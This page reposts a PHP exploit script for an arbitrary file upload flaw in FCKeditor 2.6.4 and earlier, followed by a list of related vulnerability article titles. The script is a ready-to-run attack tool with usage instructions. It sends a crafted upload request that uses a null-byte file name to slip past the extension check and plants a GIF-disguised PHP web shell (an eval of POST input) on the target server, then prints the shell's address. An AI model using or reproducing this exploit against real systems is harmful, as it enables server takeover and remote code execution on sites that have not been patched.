fckeditor<=2.6.4任意檔案上傳漏洞
<?
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
$match = array();
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "
[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
print $resp;
return $resp;
}
function connector_response($html)
{
global $match;
return (preg_match("/OnUploadCompleted((d),"(.*)")/", $html, $match) && in_array($match[1], array(0, 201)));
}
print "
+------------------------------------------------------------------+";
print "
| FCKEditor Servelet Arbitrary File Upload Exploit by Wolegequ |";
print "
+------------------------------------------------------------------+
";
if ($argc < 3)
{
print "
Usage......: php $argv[0] host path
";
print "
Example....: php $argv[0] localhost /
";
print "
Example....: php $argv[0] localhost /FCKEditor/
";
die();
}
$host = $argv[1];
$path = ereg_replace("(/){2,}", "/", $argv[2]);
$filename = "fvck.gif";
$foldername = "fuck.php%00.gif";
$connector = "editor/filemanager/connectors/php/connector.php";
$payload = "-----------------------------265001916915724
";
$payload .= "Content-Disposition: form-data; name="NewFile"; filename="{$filename}"
";
$payload .= "Content-Type: image/jpeg
";
$payload .= `GIF89a`."
".`<?php eval($_POST[a]) ?>`."
";
$payload .= "-----------------------------265001916915724--
";
$packet = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0
";
//print $packet;
$packet .= "Host: {$host}
";
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724
";
$packet .= "Content-Length: ".strlen($payload)."
";
$packet .= "Connection: close
";
$packet .= $payload;
print $packet;
if (!connector_response(http_send($host, $packet))) die("
[-] Upload failed!
");
else print "
[-] Job done! try http://${host}/$match[2]
";
?>
相關文章
- 任意檔案上傳漏洞修復
- 文字檔案上傳漏洞[任意.繞過.解析]
- 安全漏洞問題5:上傳任意檔案
- PHP未明遠端任意檔案上傳漏洞(轉)PHP
- 檔案上傳漏洞
- WEB漏洞——檔案上傳Web
- 米安程式碼審計 06 PHPYUN V3.0 任意檔案上傳漏洞PHP
- Web安全-檔案上傳漏洞Web
- 淺析檔案上傳漏洞
- WEB安全:檔案上傳漏洞Web
- fckeditor上傳突破_方法
- 檔案包含漏洞(本地包含配合檔案上傳)
- <web滲透-檔案上傳漏洞>Web
- 檔案上傳(解析)漏洞詳解
- 檔案上傳漏洞總結(全)
- 檔案上傳漏洞思路詳解
- phpcmsv9.0任意上傳漏洞PHP
- 2.6.4 指定控制檔案
- Web 安全漏洞之檔案上傳Web
- 檔案上傳漏洞(繞過姿勢)
- Vmware Vcenter 任意檔案讀取漏洞
- 網站漏洞修復之Metinfo 檔案上傳漏洞網站
- 解析漏洞與檔案上傳漏洞—一對好兄弟
- 3. 檔案上傳漏洞——漏洞總結筆記筆記
- Struts2教程7:上傳任意多個檔案
- 檔案上傳漏洞防範-檔案型別檢測型別
- 漏洞重溫之檔案上傳(總結)
- ctfshow檔案上傳漏洞做題記錄
- FCKeditor 上傳ftp asp.netFTPASP.NET
- 新型任意檔案讀取漏洞的研究
- 宏景HCM 任意檔案讀取漏洞
- phpcms的phpcms_auth導致的任意變數覆蓋漏洞、本地檔案包含漏洞和任意檔案下載漏洞PHP變數
- 檔案上傳之解析漏洞編輯器安全
- 米安程式碼審計 05 檔案上傳漏洞
- 探索網路安全:淺析檔案上傳漏洞
- php檔案上傳之多檔案上傳PHP
- 【檔案上傳繞過】路徑拼接問題導致上傳漏洞
- WebLogic 任意檔案上傳遠端程式碼執行_CVE-2018-2894漏洞復現Web